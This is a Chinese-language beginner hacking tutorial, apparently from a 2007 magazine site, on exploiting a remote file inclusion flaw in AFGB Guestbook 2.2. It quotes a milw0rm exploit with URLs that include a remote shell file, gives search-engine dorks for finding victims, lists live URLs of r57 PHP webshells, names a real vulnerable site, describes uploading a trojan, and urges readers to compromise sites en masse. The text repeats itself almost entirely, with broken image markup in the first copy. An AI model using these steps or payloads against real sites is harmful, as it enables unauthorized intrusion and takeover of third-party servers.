在本文你可以学到:
1、 怎样利用已知漏洞
2、 远程包含漏洞入侵整个过程
一、 菜鸟的感慨:
唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解!
一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机会吧,让我们尝尝坠入洞中的滋味吧”可是却只剩下那让人没有人理睬的声音在遥远的天空回荡。
说起那些做教程的高手,他们让我们我们只是看到他入侵或提权过程,却不给我们他们找漏洞的整个过程,我们看完了他的教程,却不知道何去何从。
跟着他们的步骤入侵同一个网站吧,网站不是关掉了,就是漏洞已经补上。。。。更有甚者,在网站漏洞的页面挂上木马,可耻啊!让我们沦为他们的肉鸡,让我们在担惊受怕中徘徊。做黑客,怎么可以无耻到这种地步?上天啊,求求你给我一个可以机会吧,我们用渴望的眼神望着上帝,希望他给我们提示。。。。于是。。。。《黑客手册下凡》
二 、菜鸟找漏洞
作为菜鸟的我不甘这样忍受高手的蹂躏,我要冲破束缚,翱翔在shell 的天空,这里我非常感谢我亲爱的google、百度、以及其它搜索引擎,是他们给了我们希望,给我们莫大的帮助,今天我们就让我们的 google 大和百度大叔闪亮登场,开始找洞洞的旅程吧!
首先在百度里输入“远程包含漏洞原理”这句关键字一搜,呵呵!要教程有教程,要文章有文章,我就不在多说了,2007年的第一期的《黑手》有详细的介绍,这里我简要说一下,其实远程包含漏洞就是 程序文件中的变量过滤不严可以远程包含并执行我们的php文件。
至于找程序的漏洞,对于我们菜鸟来说是比较高深的,但是,利用已经知道的漏洞也不行吗?那也太菜了,继续操作。。。。。。多搜索一些教程和文章来看看,发现一打把介绍的文章和利用的利用方法,可是都没有提示我找到漏洞站点的思路,很多都找不到利用的站点,无意中看了个教程,做的是入侵台湾留言本的步骤,从教程上得到信息有:漏洞出现的页面一个留言本的add.php 没有过滤的变量Htmls,既然漏洞出来了,我就要仔细的研究了。
在 google里输入“add.php?Htmls=”作为关键字进行搜索, 得到下图 1
500)this.width=500" border=0>
图1
进入博客找到我要的信息:
AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
2006-10-13 08:19:54
大中小
# afgb GUESTBOOK V2.2 #
# Htmls Remote File Include Vulnerability #
# Turkish Hacker\'s #
# Discovered By : mdX #
# #
#------------------------------------------------------
# Cyber-Warrior TIM #
# Ay ve YIldIzlar Geceye YakISIr... #
# the moon and the stars suit the night #
########################################################
#
# Class : REmote
########################################################
# File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include \"$Htmls\";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
# _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################
download link :http://www.afgb.to/
# milw0rm.com [2006-10-12]
现在我知道了含有漏洞文件的程序名称版本号afgb GUESTBOOK V2.2,而且让我的得很有用的站点http://www.milw0rm.com/exploits里面公布很多的漏洞如图二,希望菜鸟们到里面找到有用信息通过google、百度等搜索引擎快速拿站抓鸡吧
500)this.width=500" border=0>
图2
三.顺利的拿下一批webshell
通过前面得到的信息和google等搜索引擎的配合得到漏洞的站点,这次我们在google中搜索关键字“afgb GUESTBOOK V2.2”,如图3
500)this.width=500" border=0>
图3
找到漏洞站点了,进去逛逛吧!来到漏洞站点http://bookgb1.xoops.twpopo.com/,如图4。
500)this.width=500" border=0>
图4
至于这个程序的漏洞利用方法,这里要用到一个php木马的地址我知道的有三个:(http://www.sagi.net.cn/php.txt国内的)(http://hack-viyu.h16.ru/shell/r57shell.txt国外的r57shell)(http://pang0.by.ru/shall/pang057.zz也是r57的 ),提示注意图4和图五浏览器的区别!
500)this.width=500" border=0>
图5
按照图5地址栏所示,电击浏览器的转到按钮,或直接按enter键,出现如图6 的信息
500)this.width=500" border=0>
图6
这样就成功一半了,找可以写的目录上传我们的php木马
看下图7中其中r表示有读的权限,w 表示有写的权限,x 表示有执行的权限
500)this.width=500" border=0>
图7
找到一个可以写的路径到我们的上传的地方上传我们的木马,上传的地方如图8:
图8
500)this.width=500" border=0>
上传成功后运行我的木马,如图9。
500)this.width=500" border=0>
下面的图10、图11、图12、图13是几个具有漏洞的站点,大家可以测试一下。
500)this.width=500" border=0>
图10
500)this.width=500" border=0>
图11
500)this.width=500" border=0>
图12
500)this.width=500" border=0>
图13
啊哈!找到了webshell网站,如图14、图15。
500)this.width=500" border=0>
图14
1、 怎样利用已知漏洞
2、 远程包含漏洞入侵整个过程
一、 菜鸟的感慨:
唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解!
一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机会吧,让我们尝尝坠入洞中的滋味吧”可是却只剩下那让人没有人理睬的声音在遥远的天空回荡。
说起那些做教程的高手,他们让我们我们只是看到他入侵或提权过程,却不给我们他们找漏洞的整个过程,我们看完了他的教程,却不知道何去何从。
跟着他们的步骤入侵同一个网站吧,网站不是关掉了,就是漏洞已经补上。。。。更有甚者,在网站漏洞的页面挂上木马,可耻啊!让我们沦为他们的肉鸡,让我们在担惊受怕中徘徊。做黑客,怎么可以无耻到这种地步?上天啊,求求你给我一个可以机会吧,我们用渴望的眼神望着上帝,希望他给我们提示。。。。于是。。。。《黑客手册下凡》
二 、菜鸟找漏洞
作为菜鸟的我不甘这样忍受高手的蹂躏,我要冲破束缚,翱翔在shell 的天空,这里我非常感谢我亲爱的google、百度、以及其它搜索引擎,是他们给了我们希望,给我们莫大的帮助,今天我们就让我们的 google 大和百度大叔闪亮登场,开始找洞洞的旅程吧!
首先在百度里输入“远程包含漏洞原理”这句关键字一搜,呵呵!要教程有教程,要文章有文章,我就不在多说了,2007年的第一期的《黑手》有详细的介绍,这里我简要说一下,其实远程包含漏洞就是 程序文件中的变量过滤不严可以远程包含并执行我们的php文件。
至于找程序的漏洞,对于我们菜鸟来说是比较高深的,但是,利用已经知道的漏洞也不行吗?那也太菜了,继续操作。。。。。。多搜索一些教程和文章来看看,发现一打把介绍的文章和利用的利用方法,可是都没有提示我找到漏洞站点的思路,很多都找不到利用的站点,无意中看了个教程,做的是入侵台湾留言本的步骤,从教程上得到信息有:漏洞出现的页面一个留言本的add.php 没有过滤的变量Htmls,既然漏洞出来了,我就要仔细的研究了。
在 google里输入“add.php?Htmls=”作为关键字进行搜索, 得到下图 1
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-734ga1.jpg)
图1
进入博客找到我要的信息:
AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
2006-10-13 08:19:54
大中小
# afgb GUESTBOOK V2.2 #
# Htmls Remote File Include Vulnerability #
# Turkish Hacker\'s #
# Discovered By : mdX #
# #
#------------------------------------------------------
# Cyber-Warrior TIM #
# Ay ve YIldIzlar Geceye YakISIr... #
# the moon and the stars suit the night #
########################################################
#
# Class : REmote
########################################################
# File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include \"$Htmls\";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
# _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################
download link :http://www.afgb.to/
# milw0rm.com [2006-10-12]
现在我知道了含有漏洞文件的程序名称版本号afgb GUESTBOOK V2.2,而且让我的得很有用的站点http://www.milw0rm.com/exploits里面公布很多的漏洞如图二,希望菜鸟们到里面找到有用信息通过google、百度等搜索引擎快速拿站抓鸡吧
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-580ga2.jpg)
图2
三.顺利的拿下一批webshell
通过前面得到的信息和google等搜索引擎的配合得到漏洞的站点,这次我们在google中搜索关键字“afgb GUESTBOOK V2.2”,如图3
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-621ga3.jpg)
图3
找到漏洞站点了,进去逛逛吧!来到漏洞站点http://bookgb1.xoops.twpopo.com/,如图4。
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-360ga4.jpg)
图4
至于这个程序的漏洞利用方法,这里要用到一个php木马的地址我知道的有三个:(http://www.sagi.net.cn/php.txt国内的)(http://hack-viyu.h16.ru/shell/r57shell.txt国外的r57shell)(http://pang0.by.ru/shall/pang057.zz也是r57的 ),提示注意图4和图五浏览器的区别!
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-371ga5.jpg)
图5
按照图5地址栏所示,电击浏览器的转到按钮,或直接按enter键,出现如图6 的信息
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-797ga6.jpg)
图6
这样就成功一半了,找可以写的目录上传我们的php木马
看下图7中其中r表示有读的权限,w 表示有写的权限,x 表示有执行的权限
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-112ga7.jpg)
图7
找到一个可以写的路径到我们的上传的地方上传我们的木马,上传的地方如图8:
图8
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-784ga8.jpg)
上传成功后运行我的木马,如图9。
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-784ga81.jpg)
下面的图10、图11、图12、图13是几个具有漏洞的站点,大家可以测试一下。
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-738a10.jpg)
图10
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-140a11.jpg)
图11
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-472a12.jpg)
图12
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-876a13.jpg)
图13
啊哈!找到了webshell网站,如图14、图15。
![点击这里用新窗口浏览图片](http://www.heibai.net/article/pic/a2007-9-3-811a14.jpg)
图14